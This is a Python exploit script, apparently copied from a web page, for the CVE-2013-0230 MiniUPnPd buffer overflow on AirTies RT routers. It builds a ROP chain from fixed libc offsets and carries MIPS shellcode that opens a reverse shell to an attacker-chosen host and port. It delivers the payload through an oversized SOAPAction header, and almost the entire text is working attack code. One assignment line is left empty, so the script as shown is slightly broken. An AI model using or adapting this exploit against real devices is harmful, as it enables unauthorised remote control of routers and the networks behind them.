|
import urllib2
from string import join
from argparse import ArgumentParser
from struct import pack
from socket import inet_aton
BYTES = 4
def hex2str(value, size=BYTES):
data = ""
for i in range(0, size):
data += chr((value >> (8*i)) & 0xFF)
data = data[::-1]
return data
arg_parser = ArgumentParser(prog="miniupnpd_mips.py", description="MiniUPnPd \
CVE-2013-0230 Reverse Shell exploit for AirTies \
RT Series, start netcat on lhost:lport")
arg_parser.add_argument("--target", required=True, help="Target IP address")
arg_parser.add_argument("--lhost", required=True, help="The IP address\
which nc is listening")
arg_parser.add_argument("--lport", required=True, type=int, help="The\
port which nc is listening")
args = arg_parser.parse_args()
libc_base = 0x2aabd000
ra_1 = hex2str(libc_base + 0x36860)
s1 = hex2str(libc_base + 0x1636C)
sleep = hex2str(libc_base + 0x35620)
ra_2 = hex2str(libc_base + 0x28D3C)
s6 = hex2str(libc_base + 0x1B19C)
s2 = s6
lport = pack('>H', args.lport)
lhost = inet_aton(args.lhost)
shellcode = join([
"\x24\x11\xff\xff"
"\x24\x04\x27\x0f"
"\x24\x02\x10\x46"
"\x01\x01\x01\x0c"
"\x1e\x20\xff\xfc"
"\x24\x11\x10\x2d"
"\x24\x02\x0f\xa2"
"\x01\x01\x01\x0c"
"\x1c\x40\xff\xf8"
"\x24\x0f\xff\xfa"
"\x01\xe0\x78\x27"
"\x21\xe4\xff\xfd"
"\x21\xe5\xff\xfd"
"\x28\x06\xff\xff"
"\x24\x02\x10\x57"
"\x01\x01\x01\x0c"
"\xaf\xa2\xff\xff"
"\x8f\xa4\xff\xff"
"\x34\x0f\xff\xfd"
"\x01\xe0\x78\x27"
"\xaf\xaf\xff\xe0"
"\x3c\x0e" + lport +
"\x35\xce" + lport +
"\xaf\xae\xff\xe4"
"\x3c\x0e" + lhost[:2] +
"\x35\xce" + lhost[2:4] +
"\xaf\xae\xff\xe6"
"\x27\xa5\xff\xe2"
"\x24\x0c\xff\xef"
"\x01\x80\x30\x27"
"\x24\x02\x10\x4a"
"\x01\x01\x01\x0c"
"\x24\x0f\xff\xfd"
"\x01\xe0\x78\x27"
"\x8f\xa4\xff\xff"
"\x01\xe0\x28\x21"
"\x24\x02\x0f\xdf"
"\x01\x01\x01\x0c"
"\x24\x10\xff\xff"
"\x21\xef\xff\xff"
"\x15\xf0\xff\xfa"
"\x28\x06\xff\xff"
"\x3c\x0f\x2f\x2f"
"\x35\xef\x62\x69"
"\xaf\xaf\xff\xec"
"\x3c\x0e\x6e\x2f"
"\x35\xce\x73\x68"
"\xaf\xae\xff\xf0"
"\xaf\xa0\xff\xf4"
"\x27\xa4\xff\xec"
"\xaf\xa4\xff\xf8"
"\xaf\xa0\xff\xfc"
"\x27\xa5\xff\xf8"
"\x24\x02\x0f\xab"
"\x01\x01\x01\x0c"
], '')
payload = 'C'*2052 + s1 + 'C'*(4*4) + s6 + ra_1 + 'C'*28 + sleep + 'C'*40 + s2\
+ ra_2 + 'C'*32 + shellcode
soap_headers = {
'SOAPAction': "n:schemas-upnp-org:service:WANIPConnection:1#" + payload,
}
soap_data =
try:
print "Exploiting..."
req = urllib2.Request("http://" + args.target + ":5555", soap_data, soap_headers)
res = urllib2.urlopen(req).read()
except:
print "Ok"
|
推荐
评论(0条)
